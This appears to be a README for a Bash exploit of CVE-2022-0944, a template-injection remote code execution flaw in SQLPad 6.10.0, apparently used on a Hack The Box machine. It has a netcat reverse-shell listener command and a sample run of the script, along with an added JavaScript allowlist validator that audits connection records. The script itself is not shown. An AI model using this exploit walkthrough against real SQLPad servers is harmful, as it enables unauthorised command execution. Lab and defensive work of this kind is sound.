This Bash script exploits a remote code execution (RCE) vulnerability in SQLPad 6.10.0 by abusing the host and database fields in SQLPad's MySQL database connection settings. The exploit leverages SQLPad's unsanitized handling of these fields, which lets injected template content reach the child_process module in Node.js and execute arbitrary commands, ultimately opening a reverse shell to the attacker's machine.
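As an added, defensive example (this is not part of the exploit script or of SQLPad's own code): the two fields the exploit abuses are free-text values that should only ever contain a hostname or IP address and a plain MySQL database name, so one mitigation is strict allowlist validation of both before they reach any templating or process-spawning code. The function below also audits a list of stored connection records and reports the ones whose fields fail the allowlist, which a defender could run over an export of connection settings to spot entries that do not look like real hosts or database names. The record shape ({id, driver, host, database}) and the driver name "mysql" are assumptions, and the sample records are constructed.

```javascript
// Added defensive example: allowlist validation for the "host" and "database"
// connection fields that CVE-2022-0944 abuses in SQLPad 6.10.0. Anything that
// is not a plain hostname, IPv4 literal or MySQL identifier is rejected, so
// injected template content never reaches a template engine or child_process.

// RFC 1123 hostname label: letters, digits and hyphens, not starting or
// ending with a hyphen, at most 63 characters.
const HOST_LABEL = /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/;
// Unquoted MySQL identifier: letters, digits, '_' and '$', at most 64 characters.
const DB_IDENT = /^[A-Za-z0-9_$]{1,64}$/;

// True for a dotted-quad IPv4 literal with every octet in 0..255.
function isIPv4(value) {
  const parts = value.split(".");
  if (parts.length !== 4) return false;
  return parts.every((p) => /^\d{1,3}$/.test(p) && Number(p) <= 255);
}

// A host is acceptable if it is an IPv4 literal or an RFC 1123 hostname of
// at most 253 characters (a single trailing dot is tolerated).
function isValidHost(value) {
  if (typeof value !== "string" || value.length === 0 || value.length > 253) return false;
  if (isIPv4(value)) return true;
  const host = value.endsWith(".") ? value.slice(0, -1) : value;
  return host.length > 0 && host.split(".").every((label) => HOST_LABEL.test(label));
}

// A database name is acceptable only if it is a plain unquoted identifier.
function isValidDatabase(value) {
  return typeof value === "string" && DB_IDENT.test(value);
}

// Audit connection records (assumed shape: {id, driver, host, database}) and
// return the ids whose MySQL host or database field fails the allowlist.
function auditConnections(connections) {
  const findings = [];
  for (const c of connections) {
    if (c.driver !== "mysql") continue; // assumption: driver name used for MySQL
    const fields = [];
    if (!isValidHost(c.host)) fields.push("host");
    if (!isValidDatabase(c.database)) fields.push("database");
    if (fields.length > 0) findings.push({ id: c.id, fields });
  }
  return findings;
}

// Constructed sample records: two clean entries, two with values that a real
// host or database name could never contain, one non-MySQL entry that is skipped.
const SAMPLE_CONNECTIONS = [
  { id: "conn-1", driver: "mysql", host: "db.internal.example", database: "reports" },
  { id: "conn-2", driver: "mysql", host: "10.0.0.5", database: "app_db" },
  { id: "conn-3", driver: "mysql", host: "not-a-host name", database: "reports" },
  { id: "conn-4", driver: "mysql", host: "db.internal.example", database: "reports; extra" },
  { id: "conn-5", driver: "postgres", host: "ignored by this check", database: "pg" },
];

// Prints the flagged records when run directly: conn-3 (host) and conn-4 (database).
console.log(JSON.stringify(auditConnections(SAMPLE_CONNECTIONS), null, 2));
```

The check is deliberately an allowlist rather than a blocklist of template syntax: it does not need to know which template engine or delimiter is involved, it only needs to know what a legitimate host or database name looks like. It is a defence-in-depth measure on top of running a SQLPad version that does not have this issue.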
- Netcat listener: ensure you have a listener active on your machine with nc -lvnp 9001.
- Target server access: this exploit assumes you can communicate with the vulnerable SQLPad instance.
- Clone the repository (or copy the script locally).
- Run the script:
┌──(kali㉿kali)-[~/HTB/machines/sightless]
└─$ ./CVE-2022-0944
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
x.example.com
Please provide your IP address (e.g., 10.10.16.3):
0.0.0.0
Exploit sent. If everything went well, check your listener for a connection on port 9001.
- Follow the script's prompts to enter the target host and your IP address, then wait for the reverse shell connection on your listener.
- CVE: CVE-2022-0944
- Affected Version: SQLPad 6.10.0
- Vulnerability: Remote Code Execution (RCE) via template injection
- Impact: This exploit allows an attacker to execute commands on the target server with the privileges of the SQLPad process.
This code is for educational purposes only. Unauthorized access to computer systems is illegal. Only use this exploit with permission.